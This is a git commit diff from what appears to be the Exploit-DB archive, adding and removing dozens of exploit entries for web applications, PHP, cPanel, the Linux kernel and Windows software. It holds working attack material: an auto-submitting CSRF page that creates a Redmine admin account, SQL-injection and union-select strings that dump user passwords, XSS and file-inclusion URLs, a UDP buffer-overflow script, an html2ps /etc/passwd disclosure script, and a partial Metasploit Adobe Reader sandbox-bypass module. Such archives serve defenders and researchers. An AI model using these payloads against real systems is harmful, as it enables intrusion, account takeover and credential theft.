Updated 05_20_2014
This commit is contained in:
parent
51cca24be3
commit
16eeac4edf
89 changed files with 3715 additions and 4306 deletions
9
platforms/linux/local/33395.txt
Executable file
9
platforms/linux/local/33395.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/37277/info
|
||||
|
||||
Linux kernel is prone to a local privilege-escalation vulnerability because the software fails to verify access permissions.
|
||||
|
||||
Exploits may allow attackers to execute arbitrary code with kernel-level privileges and launch other attacks.
|
||||
|
||||
Successful exploits will result in the complete compromise of affected computers.
|
||||
|
||||
http://www.exploit-db.com/sploits/33395.tgz
|
37
platforms/linux/remote/33402.txt
Executable file
37
platforms/linux/remote/33402.txt
Executable file
|
@ -0,0 +1,37 @@
|
|||
source: http://www.securityfocus.com/bid/37322/info
|
||||
|
||||
Ruby on Rails is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
Exploiting this issue may allow a remote attacker to perform certain administrative actions, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
|
||||
|
||||
/**
|
||||
* Redmine <= 0.8.6 CSRF Add Admin User Exploit
|
||||
* Discovered by: p0deje (http://p0deje.blogspot.com)
|
||||
* Application: http://www.redmine.org/wiki/redmine/Download
|
||||
* SA: http://www.redmine.org/news/30
|
||||
* Date: 13.11.2009
|
||||
* Versions affected: <= 0.8.6
|
||||
* Description: this is a simple exploit which exploits CSRF vulnerability in Redmine, it creates user account with adminstartive rights
|
||||
*/
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form method=POST action="http://www.example.com/users/new">
|
||||
<input style="display: none" type="text" value="hacker" size="25" name="user[login]" id="user_login"/>
|
||||
<input style="display: none" type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/>
|
||||
<input style="display: none" type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/>
|
||||
<input style="display: none" type="text" value="hacker@hacker.com" size="30" name="user[mail]" id="user_mail"/>
|
||||
<input style="display: none" type="password" size="25" name="password" id="password" value="hacker" />
|
||||
<input style="display: none" type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" />
|
||||
<input style="display: none" type="checkbox" value="1" name="user[admin]" id="user_admin"/>
|
||||
<input style="display: none" type="hidden" value="1" name="user[admin]"/>
|
||||
<input style="display: none" type="submit" value="Create" id="commit" name="commit" />
|
||||
</form>
|
||||
<script>document.getElementById("commit").click();</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
/**
|
||||
* P.S. Actually, this vulnerability wasn't fixed in Redmine 0.8.7, because token was generated one time for all the pages and allthe users.
|
||||
* Thus, you can add POST data with token of any user and exploit will be working again
|
||||
*/
|
15
platforms/multiple/remote/33405.txt
Executable file
15
platforms/multiple/remote/33405.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/37338/info
|
||||
|
||||
|
||||
The APC Network Management Card is prone to multiple cross-site request-forgery and cross-site scripting vulnerabilities.
|
||||
|
||||
An attacker can exploit the cross-site request forgery issues to alter the settings on affected devices, which may lead to further network-based attacks.
|
||||
|
||||
The attacker can exploit the cross-site scripting issues to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible.
|
||||
|
||||
Versions prior to the following are vulnerable:
|
||||
|
||||
Network Management Card Firmware 3.7.2
|
||||
Network Management Card Firmware 5.1.1
|
||||
|
||||
http://www.example.com/Forms/login1?login_username=<ScRiPt>alert('hello');</ScRiPt>
|
|
@ -1,17 +0,0 @@
|
|||
Advisory Name: Local Privilege Escalation in InterScan Web Security Virtual
|
||||
Apliance 5.0
|
||||
Internal Cybsec Advisory Id: 2010-0604
|
||||
Vulnerability Class: Local Privilege Escalation
|
||||
Release Date: 22-06-2010
|
||||
Affected Applications: InterScan Web Security Virtual Aplliance 5.0. Other versions may be affected
|
||||
Affected Platforms: Red Hat nash 5.1
|
||||
Local / Remote: Local
|
||||
Severity: Medium - CVSS: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
|
||||
Researcher: Ivan Huertas
|
||||
Vendor Status: Patched
|
||||
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf
|
||||
|
||||
Vulnerability Description:
|
||||
InterScan Web Security Virtual Appliance has a shell called “uihelper” that has suid bit on. So it could be possible to execute commands as root. Also using the vulnerability “Arbitrary File Upload” remote commands could be run as root.
|
||||
|
||||
http://www.exploit-db.com/sploits/cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf
|
|
@ -1,46 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
# html2ps <= 1.0 beta5 arbitrary file disclosure
|
||||
# http://user.it.uu.se/~jan/html2ps.html
|
||||
# author: epiphant <epiphant.0@gmail.com>
|
||||
#
|
||||
# the "include file" ssi directive doesn't check for directory
|
||||
# traversal so you can include and disclose any file in the
|
||||
# dir tree (very handy when html2ps is running as a part of a
|
||||
# web app with data that you control)
|
||||
# the vuln requires that "ssi" in the @html2ps block in the
|
||||
# html2psrc file is set to 1, which is the default
|
||||
#
|
||||
# bonus info: some of the backtick operators look shady too
|
||||
# but will require lots of prerequisites so they're uncool
|
||||
#
|
||||
# shouts: thcx labs, zybadawg333, fabiodds, str0ke
|
||||
# jan k: shame on you - your perl is very ugly
|
||||
#
|
||||
|
||||
import os
|
||||
|
||||
d = """\
|
||||
<html>
|
||||
<head>
|
||||
<title>epiphant</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>epiphant</h1>
|
||||
<!--#include file="../../../../../../../etc/passwd"-->
|
||||
<p>epiphant</p>
|
||||
</body>
|
||||
</html>
|
||||
"""
|
||||
|
||||
try:
|
||||
fi = open("epiphant.html", "w")
|
||||
fi.write(d)
|
||||
fi.close()
|
||||
except:
|
||||
print "can't write here"
|
||||
exit(1)
|
||||
|
||||
os.system("html2ps epiphant.html > epiphant.ps")
|
||||
os.system("gv epiphant.ps")
|
||||
exit(0)
|
20
platforms/php/remote/33414.php
Executable file
20
platforms/php/remote/33414.php
Executable file
|
@ -0,0 +1,20 @@
|
|||
source: http://www.securityfocus.com/bid/37389/info
|
||||
|
||||
PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks.
|
||||
|
||||
Versions prior to PHP 5.2.12 are vulnerable.
|
||||
|
||||
// overlong UTF-8 sequence
|
||||
echo htmlspecialchars("A\xC0\xAF&", ENT_QUOTES, 'UTF-8');
|
||||
// invalid Shift_JIS sequence
|
||||
echo htmlspecialchars("B\x80&", ENT_QUOTES, 'Shift_JIS');
|
||||
echo htmlspecialchars("C\x81\x7f&", ENT_QUOTES, 'Shift_JIS');
|
||||
// invalid EUC-JP sequence
|
||||
echo htmlspecialchars("D\x80&", ENT_QUOTES, 'EUC-JP');
|
||||
echo htmlspecialchars("E\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
|
||||
echo htmlspecialchars("F\x8E\xFF&", ENT_QUOTES, 'EUC-JP');
|
||||
echo htmlspecialchars("G\x8F\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
|
23
platforms/php/remote/33415.php
Executable file
23
platforms/php/remote/33415.php
Executable file
|
@ -0,0 +1,23 @@
|
|||
source: http://www.securityfocus.com/bid/37389/info
|
||||
|
||||
PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks.
|
||||
|
||||
Versions prior to PHP 5.2.12 are vulnerable.
|
||||
|
||||
<? php
|
||||
|
||||
$ _GET [ ' a1 ' ] = " \xf0 "; // \xf0 - \xfc ??? $ _GET [ 'A1'] = "\ xf0"; / / \ xf0 - \ xfc possible
|
||||
$ _GET [ ' a2 ' ] = " href=dummy onmouseover=alert(document.title) dummy=dummy "; $ _GET [ 'A2'] = "href = dummy onmouseover = alert (document.title) dummy = dummy";
|
||||
|
||||
header ( " Content-Type:text/html; charset=Shift_JIS " ) ; header ( "Content-Type: text / html; charset = Shift_JIS");
|
||||
?> ? "
|
||||
< html > <Html>
|
||||
< head >< title > Shift_JIS test </ title ></ head > <Head> <title> Shift_JIS test </ title> </ head>
|
||||
< body > <Body>
|
||||
< p >< a <P> <a title = " <?php echo htmlspecialchars ( $ _GET [ ' a1 ' ] , ENT_QUOTES, ' SJIS ' ) ?> " title = "<? php echo htmlspecialchars ($ _GET [ 'a1'], ENT_QUOTES, 'SJIS')?>" href = " <?php echo htmlspecialchars ( $ _GET [ ' a2 ' ] , ENT_QUOTES, ' SJIS ' ) ?> " > test </ a ></ p > href = "<? php echo htmlspecialchars ($ _GET [ 'a2'], ENT_QUOTES, 'SJIS')?>"> test </ a> </ p>
|
||||
</ body > </ Body>
|
||||
</ html > </ Html>
|
|
@ -1,6 +1,6 @@
|
|||
source: http://www.securityfocus.com/bid/9664/info
|
||||
|
||||
Reportedly the AllMyPHP applications AllMyGuests, AllMyLinks and AllMyVisitors are prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
|
||||
Reportedly the AllMyPHP application AllMyGuests is prone to a remote file include vulnerability. The issue is due to insufficient filtering of URI passed variables that are used in a 'require_once()' call.
|
||||
|
||||
This issue may allow a remote attacker to execute arbitrary commands on the affected system with the privileges of the web server. Other attacks may be possible as well.
|
||||
|
||||
|
|
12
platforms/php/webapps/33401.txt
Executable file
12
platforms/php/webapps/33401.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/37315/info
|
||||
|
||||
Million Pixel Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Million Pixel Script 3, 3 Pro, and 3 Pro Lotto are vulnerable; other versions may also be affected.
|
||||
|
||||
|
||||
The following example URI is available:
|
||||
|
||||
http://www.example.com/?pa=[XSS]
|
9
platforms/php/webapps/33404.txt
Executable file
9
platforms/php/webapps/33404.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/37329/info
|
||||
|
||||
phpFaber CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
The following example is available:
|
||||
|
||||
http://www.example.com/module.php?mod=[XSS]
|
11
platforms/php/webapps/33406.txt
Executable file
11
platforms/php/webapps/33406.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/37351/info
|
||||
|
||||
Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
This issue affects versions prior to Horde 3.3.6.
|
||||
|
||||
Note that additional products that use the Horde framework may also be vulnerable.
|
||||
|
||||
http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
|
11
platforms/php/webapps/33407.txt
Executable file
11
platforms/php/webapps/33407.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/37351/info
|
||||
|
||||
Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
This issue affects versions prior to Horde 3.3.6.
|
||||
|
||||
Note that additional products that use the Horde framework may also be vulnerable.
|
||||
|
||||
http://www.example.com/horde-3.3.5/admin/cmdshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
|
11
platforms/php/webapps/33408.txt
Executable file
11
platforms/php/webapps/33408.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/37351/info
|
||||
|
||||
Horde Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
This issue affects versions prior to Horde 3.3.6.
|
||||
|
||||
Note that additional products that use the Horde framework may also be vulnerable.
|
||||
|
||||
http://www.example.com/horde-3.3.5/admin/sqlshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
|
10
platforms/php/webapps/33409.txt
Executable file
10
platforms/php/webapps/33409.txt
Executable file
|
@ -0,0 +1,10 @@
|
|||
source: http://www.securityfocus.com/bid/37356/info
|
||||
|
||||
Article Directory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
The following example is available:
|
||||
|
||||
Username : X' or ' 1=1
|
||||
Password : X' or ' 1=1
|
13
platforms/php/webapps/33410.txt
Executable file
13
platforms/php/webapps/33410.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/37371/info
|
||||
|
||||
The Sections module for Drupal is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
To exploit this issue, the attacker must have 'administer sections' permissions.
|
||||
|
||||
Versions prior to Sections 5.x-1.3 and 6.x-1.3 are vulnerable.
|
||||
|
||||
The following example input is available:
|
||||
|
||||
<script>alert('xss');</script>
|
9
platforms/php/webapps/33411.txt
Executable file
9
platforms/php/webapps/33411.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/37380/info
|
||||
|
||||
iDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
iSupport 1.8 and prior versions are vulnerable.
|
||||
|
||||
http://www.example.comhelpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
|
9
platforms/php/webapps/33412.txt
Executable file
9
platforms/php/webapps/33412.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/37380/info
|
||||
|
||||
iDevSpot iSupport is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
iSupport 1.8 and prior versions are vulnerable.
|
||||
|
||||
http://www.example.com/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
|
9
platforms/php/webapps/33413.txt
Executable file
9
platforms/php/webapps/33413.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/37384/info
|
||||
|
||||
Pluxml-Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Pluxml-Blog 4.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/[path]/core/admin/auth.php?p=1">
|
9
platforms/php/webapps/33416.txt
Executable file
9
platforms/php/webapps/33416.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/37393/info
|
||||
|
||||
QuiXplorer is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
|
||||
|
||||
QuiXplorer 2.4.1beta is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/path/?lang=../path/to/malicious_uploaded_code
|
12
platforms/php/webapps/33417.txt
Executable file
12
platforms/php/webapps/33417.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/37394/info
|
||||
|
||||
cPanel is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
cPanel versions prior to 11.25.0 are affected.
|
||||
|
||||
|
||||
http://www.example.com:2082/frontend/x3/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS
|
||||
|
||||
http://www.example.com:2082/frontend/x3/files/dofileop.html?fileop=&opdir=&opfile=&dir=%2fhome%2fuser%2ftmp&fileop=HaCkED%20by%20RENO
|
7
platforms/php/webapps/33418.txt
Executable file
7
platforms/php/webapps/33418.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/37403/info
|
||||
|
||||
The 'com_joomportfolio' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?option=com_joomportfolio&Itemid=552&task=showcat&catid=1&secid=1/**/and/**/1=0/**/union/**/select/**/concat(username,0x3a,password),user()/**/from/**/jos_users/**/
|
9
platforms/php/webapps/33419.txt
Executable file
9
platforms/php/webapps/33419.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/37408/info
|
||||
|
||||
F3Site is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
|
||||
|
||||
F3Site 2009 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/mod/poll.php?GLOBALS[nlang]=[LFI%00]
|
9
platforms/php/webapps/33420.txt
Executable file
9
platforms/php/webapps/33420.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/37408/info
|
||||
|
||||
F3Site is prone to multiple local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
|
||||
|
||||
F3Site 2009 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/mod/new.php?GLOBALS[nlang]=[LFI%00]
|
|
@ -25,7 +25,7 @@ note: generally admin name: admin
|
|||
|
||||
admin login for demo:
|
||||
|
||||
http://demo.deltascripts.com/classifieds/admin/login.php
|
||||
http://localhost/classifieds/admin/login.php
|
||||
|
||||
|
||||
example for demo:
|
||||
|
@ -40,7 +40,7 @@ example 2:
|
|||
|
||||
admin login:
|
||||
|
||||
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
|
||||
http://localhost/anunturi/admin/login.php
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
[~] deltascripts phpclassifieds Remote Auth Bypass Vulnerability
|
||||
[~] deltascripts phplinks Remote Auth Bypass Vulnerability
|
||||
[~]
|
||||
[~] ----------------------------------------------------------
|
||||
[~] Discovered By: ZoRLu
|
||||
|
@ -25,7 +25,7 @@ note: generally admin name: admin
|
|||
|
||||
admin login for demo:
|
||||
|
||||
http://demo.deltascripts.com/classifieds/admin/login.php
|
||||
http://localhost/classifieds/admin/login.php
|
||||
|
||||
|
||||
example for demo:
|
||||
|
@ -40,7 +40,7 @@ example 2:
|
|||
|
||||
admin login:
|
||||
|
||||
http://www.maramuresul-istoric.ro/anunturi/admin/login.php
|
||||
http://localhost/anunturi/admin/login.php
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -1,22 +0,0 @@
|
|||
[*] Endonesia 8.4 CMS
|
||||
[*] Site: http://www.endonesia.org/
|
||||
[*] Download: http://sourceforge.net/projects/endonesia
|
||||
[*] Bug: Local File Inclusion in mod.php file !
|
||||
[*] Author: s4r4d0
|
||||
[*] Mail: s4r4d0@yahoo.com
|
||||
[*] Team: Fatal Error
|
||||
[*] Poc:http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00
|
||||
[*] DEMO:http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00
|
||||
[*] SecurityReason Note :
|
||||
#
|
||||
# Vulnerable Code in mod.php :
|
||||
#
|
||||
# include("./mod/$mod/index.php");
|
||||
#
|
||||
# magic_quotes = Off
|
||||
#
|
||||
# - sp3x
|
||||
#
|
||||
[*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x !
|
||||
[*] Made in Brazil
|
||||
[*] Reference: http://securityreason.com/exploitalert/7435
|
29
platforms/windows/dos/33403.py
Executable file
29
platforms/windows/dos/33403.py
Executable file
|
@ -0,0 +1,29 @@
|
|||
source: http://www.securityfocus.com/bid/37325/info
|
||||
|
||||
Intellicom 'NetBiterConfig.exe' is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
|
||||
|
||||
Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
# Intellicom NetBiterConfig.exe 1.3.0 Remote Stack Overwrite.
|
||||
# Ruben Santamarta - www.reversemode.com
|
||||
# For research purposes ONLY.
|
||||
# If you use this code to cause damage I’ll cut you open like a f***ing pig.
|
||||
|
||||
import sys
|
||||
import socket
|
||||
|
||||
s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
|
||||
s.connect(("10.10.10.10",3250))
|
||||
s.send("protocol version = 1.10; "
|
||||
+"fb type = EVIL-DEVICE; "
|
||||
+"module version = 0.66.6; "
|
||||
+"mac = 00-30-11-00-BA-CA; "
|
||||
+"ip = 192.168.1.52; "
|
||||
+"sn = 255.255.255.0; "
|
||||
+"gw = 192.168.1.1; "
|
||||
+"dhcp = off; "
|
||||
+"pswd = off; "
|
||||
+"hn = "+"A"*0×60+"; "
|
||||
+"dns1 = 192.168.1.33;")
|
|
@ -1,358 +0,0 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
require 'msf/core/post/windows/registry'
|
||||
require 'msf/core/post/common'
|
||||
require 'msf/core/post/file'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Post::Common
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Registry
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability on Adobe Reader X Sandbox. The
|
||||
vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe
|
||||
process to write register values which can be used to trigger a buffer overflow on
|
||||
the AdobeCollabSync component, allowing to achieve Medium Integrity Level
|
||||
privileges from a Low Integrity AcroRd32.exe process. This module has been tested
|
||||
successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Felipe Andres Manzano', # Vulnerability discovery and PoC
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-2730' ],
|
||||
[ 'OSVDB', '93355' ],
|
||||
[ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ]
|
||||
],
|
||||
'Arch' => ARCH_X86,
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => 'meterpreter',
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 12288,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Adobe Reader X 10.1.4 / Windows 7 SP1',
|
||||
{
|
||||
'AdobeCollabSyncTrigger' => 0x18fa0,
|
||||
'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF"
|
||||
}
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate'=> 'May 14 2013'
|
||||
}))
|
||||
|
||||
end
|
||||
|
||||
def on_new_session
|
||||
print_status("Deleting Malicious Registry Keys...")
|
||||
if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
|
||||
print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself")
|
||||
end
|
||||
if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
|
||||
print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself")
|
||||
end
|
||||
print_status("Cleanup finished")
|
||||
end
|
||||
|
||||
# Test the process integrity level by trying to create a directory on the TEMP folder
|
||||
# Access should be granted with Medium Integrity Level
|
||||
# Access should be denied with Low Integrity Level
|
||||
# Usint this solution atm because I'm experiencing problems with railgun when trying
|
||||
# use GetTokenInformation
|
||||
def low_integrity_level?
|
||||
tmp_dir = expand_path("%TEMP%")
|
||||
cd(tmp_dir)
|
||||
new_dir = "#{rand_text_alpha(5)}"
|
||||
begin
|
||||
session.shell_command_token("mkdir #{new_dir}")
|
||||
rescue
|
||||
return true
|
||||
end
|
||||
|
||||
if directory?(new_dir)
|
||||
session.shell_command_token("rmdir #{new_dir}")
|
||||
return false
|
||||
else
|
||||
return true
|
||||
end
|
||||
end
|
||||
|
||||
def check_trigger
|
||||
signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length)
|
||||
if signature == target['AdobeCollabSyncTriggerSignature']
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
def collect_addresses
|
||||
# find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe
|
||||
@addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger']
|
||||
vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}")
|
||||
|
||||
# find kernel32.dll
|
||||
kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll")
|
||||
@addresses['kernel32.dll'] = kernel32["return"]
|
||||
if @addresses['kernel32.dll'] == 0
|
||||
fail_with(Exploit::Failure::Unknown, "Unable to find kernel32.dll")
|
||||
end
|
||||
vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}")
|
||||
|
||||
# find kernel32.dll methods
|
||||
virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc")
|
||||
@addresses['VirtualAlloc'] = virtual_alloc["return"]
|
||||
if @addresses['VirtualAlloc'] == 0
|
||||
fail_with(Exploit::Failure::Unknown, "Unable to find VirtualAlloc")
|
||||
end
|
||||
vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}")
|
||||
|
||||
reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA")
|
||||
@addresses['RegGetValueA'] = reg_get_value["return"]
|
||||
if @addresses['RegGetValueA'] == 0
|
||||
fail_with(Exploit::Failure::Unknown, "Unable to find RegGetValueA")
|
||||
end
|
||||
vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}")
|
||||
|
||||
# find ntdll.dll
|
||||
ntdll = session.railgun.kernel32.GetModuleHandleA("ntdll.dll")
|
||||
@addresses['ntdll.dll'] = ntdll["return"]
|
||||
if @addresses['ntdll.dll'] == 0
|
||||
fail_with(Exploit::Failure::Unknown, "Unable to find ntdll.dll")
|
||||
end
|
||||
vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}")
|
||||
end
|
||||
|
||||
# Search a gadget identified by pattern on the process memory
|
||||
def search_gadget(base, offset_start, offset_end, pattern)
|
||||
mem = base + offset_start
|
||||
length = offset_end - offset_start
|
||||
